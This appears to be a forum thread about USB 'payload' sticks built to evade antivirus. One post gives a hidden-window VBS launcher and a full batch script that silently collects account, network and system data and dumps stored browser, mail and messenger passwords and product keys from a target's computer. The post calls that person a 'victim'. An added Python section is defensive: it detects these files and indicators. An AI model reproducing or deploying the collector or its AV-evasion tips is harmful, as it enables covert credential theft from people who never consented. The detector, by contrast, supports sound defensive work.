
iknuts

Posts posted by iknuts

  1. No, it is picked up by AVs a lot. However, I've recently been messing around with what I'll call "GhostPad" for now, and I'm making one that doesn't get picked up by most AVs, so it's undetectable, and is just to recover info from computers; no PWdump, because it's detected by most AVs.

    GhostPad. If you want it truly undetectable, i.e. your victim won't get any warnings no matter what, delete everything from NirSoft (chromepass, iehv, iepv, mailpv, mspass, produkey).

    Yeah, but this stuff is mainly dead. What might interest the OP is this: if you throw on a command-line switch, you can have your keylogger write to and hide in a "ghosted" folder.

    Also, use this in a .vbs file and open it with a batch file referencing your start, and it'll run without a window.

    ' Runs the first argument (the batch file) with window style 0 (hidden); False = don't wait for it to finish
    CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

    Also, making something similar to USB 3.0 (so AVs can't delete files):

    Download, make a CD partition, add your ISO. Make an ISO with MagicISO or some other software.

    :P What I had planned was a Swiss Army Knife that includes ByteSpy, Cain, Cheat Engine, MD5 Hash Changer, IP Changer, PortBlocker, MAC Address Changer, Trainer Maker, UDP-Unicorn, Wireshark, Panther, smsniff, LanSchool Crasher, VirtualBox and uTorrent, and all of that with the payload was under 150 MB.

    Batch file for the payload:

    @echo off

    :: Thanks to GuidoZ for the template idea.

    :: I don't know who originally made this forensics script, but it has been upgraded over time by me.

    :: Setting Log File Location

    SET logdir="%1\logs\%computername%"

    IF NOT EXIST %1\logs\%computername% (

    MD %1\logs\%computername%

    )

    :: Adding an ignore for your own computer

    IF EXIST "%systemroot%\safe.dat" goto End

    IF NOT EXIST "%systemroot%\safe.dat" goto INFO

    :INFO

    ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

    ECHO +-----------------------------------------+ >> %1\logs\%computername%\info.txt

    ECHO + + >> %1\logs\%computername%\info.txt

    ECHO + yyy_not's Payload / Swiss Army Knife + >> %1\logs\%computername%\info.txt

    ECHO + + >> %1\logs\%computername%\info.txt

    ECHO +-----------------------------------------+ >> %1\logs\%computername%\info.txt

    ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

    ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

    ECHO + http://tox1kmods.webs.com + >> %1\logs\%computername%\info.txt

    ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

    ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

    ECHO [Time Started: %date% %time%] >> %1\logs\%computername%\info.txt

    ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

    goto LOCALACCTS

    :LOCALACCTS

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

    ECHO + [Local User Accounts] +>> %1\logs\%computername%\localaccts-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

    ECHO [STARTED: %date% %time%] >> %1\logs\%computername%\localaccts-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

    echo Local User Accounts: >>%1\logs\%computername%\localaccts-%computername%.txt

    net users >> %1\logs\%computername%\localaccts-%computername%.txt

    echo Currently Logged on Users: >>%1\logs\%computername%\localaccts-%computername%.txt

    psloggedon /accepteula >> %1\logs\%computername%\localaccts-%computername%.txt

    echo Local Groups: >>%1\logs\%computername%\localaccts-%computername%.txt

    net localgroup >> %1\logs\%computername%\localaccts-%computername%.txt

    echo Members of the local administrators group: >>%1\logs\%computername%\localaccts-%computername%.txt

    net localgroup administrators >> %1\logs\%computername%\localaccts-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

    ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\localaccts-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localaccts-%computername%.txt

    echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\localaccts-%computername%.txt

    goto LOCALNET

    :LOCALNET

    ECHO +-----------------------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

    ECHO + [Network Info, ARP Tables, Open Connections, Firewall Status] +>> %1\logs\%computername%\localnet-%computername%.txt

    ECHO +-----------------------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

    ECHO [STARTED: %date% %time%] >> %1\logs\%computername%\localnet-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

    echo Current IP Configuration: >> %1\logs\%computername%\localnet-%computername%.txt

    ipconfig /all >> %1\logs\%computername%\localnet-%computername%.txt

    echo Contents of the DNS Cache: >> %1\logs\%computername%\localnet-%computername%.txt

    ipconfig /displaydns >> %1\logs\%computername%\localnet-%computername%.txt

    echo ARP Table Contents: >> %1\logs\%computername%\localnet-%computername%.txt

    arp -a >> %1\logs\%computername%\localnet-%computername%.txt

    echo Status of active TCP and UDP connections: >> %1\logs\%computername%\localnet-%computername%.txt

    netstat -ano >> %1\logs\%computername%\localnet-%computername%.txt

    echo Routing Table: >> %1\logs\%computername%\localnet-%computername%.txt

    route print >> %1\logs\%computername%\localnet-%computername%.txt

    echo Hosts file contents: >> %1\logs\%computername%\localnet-%computername%.txt

    type %systemroot%\system32\drivers\etc\hosts >> %1\logs\%computername%\localnet-%computername%.txt

    echo Windows Firewall Configuration: >> %1\logs\%computername%\localnet-%computername%.txt

    netsh firewall show state >> %1\logs\%computername%\localnet-%computername%.txt

    echo Windows Firewall service state: >> %1\logs\%computername%\localnet-%computername%.txt

    netsh firewall show service >> %1\logs\%computername%\localnet-%computername%.txt

    echo Mapped Network Drives: >> %1\logs\%computername%\localnet-%computername%.txt

    net use >> %1\logs\%computername%\localnet-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

    ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\localnet-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\localnet-%computername%.txt

    echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\localnet-%computername%.txt

    goto SYSINFO

    :SYSINFO

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO + [Installed Software, Running Processes] + >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO [STARTED: %date% %time%] >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    echo Machine Information: >> %1\logs\%computername%\sysinfo-%computername%.txt

    psinfo /accepteula /h /s >> %1\logs\%computername%\sysinfo-%computername%.txt

    echo Running Processes: >> %1\logs\%computername%\sysinfo-%computername%.txt

    pslist -t /accepteula >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO + [Services from Running Processes] + >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    echo Services running from each process: >> %1\logs\%computername%\sysinfo-%computername%.txt

    tasklist /svc >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO + [State of Services on Machine] + >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    echo Service states: >> %1\logs\%computername%\sysinfo-%computername%.txt

    sc query state= all >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO + [Installed Printers] + >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    echo Printer Information: >> %1\logs\%computername%\sysinfo-%computername%.txt

    cscript %WINDIR%\System32\Prnmngr.vbs -l >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO + [Group Policies] + >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    echo Effective group policies: >> %1\logs\%computername%\sysinfo-%computername%.txt

    gpresult -r -z >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO + [Drivers in use] + >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    echo Drivers currently in use: >> %1\logs\%computername%\sysinfo-%computername%.txt

    driverquery >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO + [System Variables] + >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    echo System Variables: >> %1\logs\%computername%\sysinfo-%computername%.txt

    set >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO + [Startup Run RunOnce] + >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    REM Export the Run and RunOnce Values inside HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER

    reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run %1\logs\%computername%\HKLMrun.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt

    reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Runonce %1\logs\%computername%\HKLMrunonce.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt

    reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run %1\logs\%computername%\HKCUrun.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt

    reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce %1\logs\%computername%\HKCUrunonce.reg -y >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\sysinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\sysinfo-%computername%.txt

    echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\sysinfo-%computername%.txt

    goto ERRORLOG

    :ERRORLOG

    ECHO +---------------------------------------+ >> %1\logs\%computername%\syslog-%computername%.txt

    ECHO + [System Error Log] +>> %1\logs\%computername%\syslog-%computername%.txt

    ECHO +---------------------------------------+ >> %1\logs\%computername%\syslog-%computername%.txt

    ECHO. >> %1\logs\%computername%\syslog-%computername%.txt

    ECHO This will only work on Windows XP / Server 2003, which ship eventquery.vbs >> %1\logs\%computername%\syslog-%computername%.txt

    ECHO. >> %1\logs\%computername%\syslog-%computername%.txt

    REM Grab System Error Log for Review (Error ONLY)

    cscript %WINDIR%\System32\eventquery.vbs /fi "Type eq Error" /V /L System >> %1\logs\%computername%\syslog-%computername%.txt

    REM Grab Application Error Logs for Review

    cscript %WINDIR%\System32\eventquery.vbs /fi "Type eq Error" /V /L Application >> %1\logs\%computername%\syslog-%computername%.txt

    goto PORT

    :PORT

    ECHO +----------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

    ECHO + [Port Scan] + >> %1\logs\%computername%\netlog-info-%computername%.txt

    ECHO +----------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

    ECHO [STARTED: %date% %time%] >> %1\logs\%computername%\netlog-info-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

    START .\portqry -local -l %1\logs\%computername%\netlog-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

    ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\netlog-info-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\netlog-info-%computername%.txt

    goto MD5

    :MD5

    ECHO +----------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

    ECHO + [MD5 Hashes of the system directory] +>> %1\logs\%computername%\osmd5-%computername%.txt

    ECHO +----------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

    ECHO [STARTED: %date% %time%] >> %1\logs\%computername%\osmd5-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

    echo %date% %time% >> %1\logs\%computername%\osmd5-%computername%.txt

    md5sums %systemroot% >> %1\logs\%computername%\osmd5-%computername%.txt

    md5sums %systemroot%\system >> %1\logs\%computername%\osmd5-%computername%.txt

    md5sums %systemroot%\system32 >> %1\logs\%computername%\osmd5-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

    ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\osmd5-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\osmd5-%computername%.txt

    echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\osmd5-%computername%.txt

    goto MDINFO

    :MDINFO

    IF NOT EXIST %1\logs\%computername%\userinfo (

    MD %1\logs\%computername%\userinfo\

    )

    goto MDPASS

    :MDPASS

    IF NOT EXIST %1\logs\%computername%\userinfo\pass (

    MD %1\logs\%computername%\userinfo\pass\

    )

    goto IEFIREHIST

    :IEFIREHIST

    ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO + [Information Recovery] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO [STARTED: %date% %time%] >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\urllog-%computername%.txt

    ECHO + [Dumping IE and FireFox history] +>> %1\logs\%computername%\userinfo\urllog-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\urllog-%computername%.txt

    START .\FirePassword.exe >> %1\logs\%computername%\userinfo\pass\firepass-%computername%.txt

    START cscript .\IE_FireFox.vbs >> %1\logs\%computername%\userinfo\firehistorylog-%computername%.txt

    START .\iehv.exe /stext %1\logs\%computername%\userinfo\IElog-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO Passwords stored in .\pass\firepass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO Firefox history stored in .\firehistorylog-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO IE history stored in .\IElog-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO + [Dump Mail PW] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +--------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO Passwords stored in .\pass\mailpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    START .\mailpv.exe /stext "%1\logs\%computername%\userinfo\pass\mailpass-%computername%.txt" /sort "Application" /sort "Name"

    ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO + [Dump IE PW] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO Passwords stored in .\pass\IEpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    START .\iepv.exe /stext "%1\logs\%computername%\userinfo\pass\IEpass-%computername%.txt" /sort "Entry Name"

    ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO + [Dump Messenger PW] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO Passwords will be dumped in .\pass\MSpass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    START .\mspass.exe /stext %1\logs\%computername%\userinfo\pass\MSpass-%computername%.txt

    ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO + [Dump Product Keys] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +----------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    START .\PRODUKEY.exe /nosavereg /stext "%1\logs\%computername%\userinfo\productkeys-%computername%.txt" /remote %computername% >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO + [Dumping Chrome Passwords] + >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO Passwords stored in .\pass\chromepass-%computername%.txt >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO. >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    START .\ChromePass.exe /stext %1\logs\%computername%\userinfo\pass\chromepass-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO [COMPLETED: %date% %time%] >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    ECHO +----------------------------------------------------+ >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    echo FILE SIGNATURE %random%%random%%random% >> %1\logs\%computername%\userinfo\userinfo-%computername%.txt

    goto END

    :END

    ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

    ECHO [Time Completed: %date% %time%] >> %1\logs\%computername%\info.txt

    ECHO ------------------------------------------- >> %1\logs\%computername%\info.txt

    START EXPLORER.EXE

    exit

    I just downloaded GhostPad... how do I install it? (Sorry if I annoy you with my newbie questions.)
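Whatever the hidden .vbs launcher and a read-only CD partition do to keep AV from deleting the payload, the collector above leaves a very recognisable footprint on the stick itself: the NirSoft and Sysinternals binaries by name, the `/stext` and `/accepteula` switches, the `\logs\%computername%` output layout, the `%systemroot%\safe.dat` kill-switch check, and a `WScript.Shell.Run ..., 0, ...` launcher. The script below is an added example by the editor, not code from the original post, from GhostPad or from the Swiss Army Knife; it scans a directory (think a freshly mounted USB stick) for those indicators. The tool names and switches are taken exactly as they appear in the batch file above; the sample stick it builds is constructed, with empty placeholder files standing in for the .exe tools, so it runs offline.

```python
import os
import re
import tempfile
from collections import Counter
from dataclasses import dataclass

# Helper binaries the posted batch file invokes (NirSoft password viewers,
# Sysinternals tools, portqry, md5sums). Compared case-insensitively.
TOOL_NAMES = {
    "iehv.exe", "iepv.exe", "mailpv.exe", "mspass.exe", "produkey.exe",
    "chromepass.exe", "firepassword.exe", "psloggedon.exe", "pslist.exe",
    "psinfo.exe", "portqry.exe", "md5sums.exe",
}

# Text fingerprints lifted from the batch file and the .vbs launcher above.
SCRIPT_PATTERNS = {
    "nirsoft_stext_dump": re.compile(r"/stext\b", re.I),
    "sysinternals_eula_suppress": re.compile(r"/accepteula\b", re.I),
    "kill_switch_file": re.compile(r"safe\.dat", re.I),
    "log_dir_layout": re.compile(r"\\logs\\%computername%", re.I),
    # WScript.Shell.Run with window style 0 (hidden) is the launcher trick.
    "hidden_wscript_run": re.compile(
        r'CreateObject\("WScript\.Shell"\)\.Run\b.*,\s*0\s*,\s*(True|False)', re.I),
}
SCRIPT_EXTS = {".bat", ".cmd", ".vbs"}


@dataclass(frozen=True)
class Finding:
    path: str
    indicator: str


def scan_tree(root):
    """Walk `root` and return one Finding per (file, indicator) hit."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            lower = name.lower()
            if lower in TOOL_NAMES:
                findings.append(Finding(path, "tool_binary:" + lower))
            if os.path.splitext(lower)[1] in SCRIPT_EXTS:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
                for label, pattern in SCRIPT_PATTERNS.items():
                    if pattern.search(text):
                        findings.append(Finding(path, label))
    return findings


def summarize(findings):
    """Count hits per indicator for a quick triage verdict."""
    return dict(Counter(f.indicator for f in findings))


# Constructed sample stick (hypothetical contents): a trimmed menu.bat in the
# style of the posted script, the .vbs launcher, and empty placeholder "tools".
SAMPLE_MENU_BAT = r"""@echo off
IF EXIST "%systemroot%\safe.dat" goto End
START .\iehv.exe /stext %1\logs\%computername%\userinfo\IElog-%computername%.txt
psloggedon /accepteula >> %1\logs\%computername%\localaccts-%computername%.txt
:End
"""
SAMPLE_RUN_VBS = r'CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False'


def build_sample_tree(root):
    os.makedirs(os.path.join(root, "payload"))
    with open(os.path.join(root, "menu.bat"), "w") as fh:
        fh.write(SAMPLE_MENU_BAT)
    with open(os.path.join(root, "payload", "run.vbs"), "w") as fh:
        fh.write(SAMPLE_RUN_VBS)
    for name in ("iehv.exe", "mailpv.exe", "ChromePass.exe"):
        open(os.path.join(root, "payload", name), "wb").close()  # placeholder, not a real binary
    with open(os.path.join(root, "README.txt"), "w") as fh:
        fh.write("holiday photos\n")  # benign file, must produce no finding


def demo():
    """Build the sample stick in a temp dir, scan it, return the summary dict."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return summarize(scan_tree(root))


if __name__ == "__main__":
    for indicator, count in sorted(demo().items()):
        print(f"{count:2d}  {indicator}")
```

Two practical notes. The file-name list is the weakest signal (renaming a NirSoft binary costs nothing), so the script-text patterns carry more weight; `/stext` plus a `\logs\%computername%` path is the combination to alert on. And the script's own `IF EXIST "%systemroot%\safe.dat" goto End` line is a free vaccine: dropping an empty `safe.dat` in `%systemroot%` makes this particular payload exit before collecting anything, though only this exact script honours it.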

  2. Hi guys... I still have no idea how to install this... I realize it's been 3 years since anyone responded to this topic, but I'm hoping someone can help me out.

    My USB is non-U3. I've got the payload, but every time I run menu.bat and try to enable modules, the command result is 'File not found'... what am I doing wrong?

    Thanks
